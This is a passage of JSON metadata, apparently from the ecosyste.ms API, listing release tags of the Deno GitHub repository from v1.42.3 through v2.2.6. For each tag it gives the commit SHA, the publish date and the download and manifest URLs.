purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G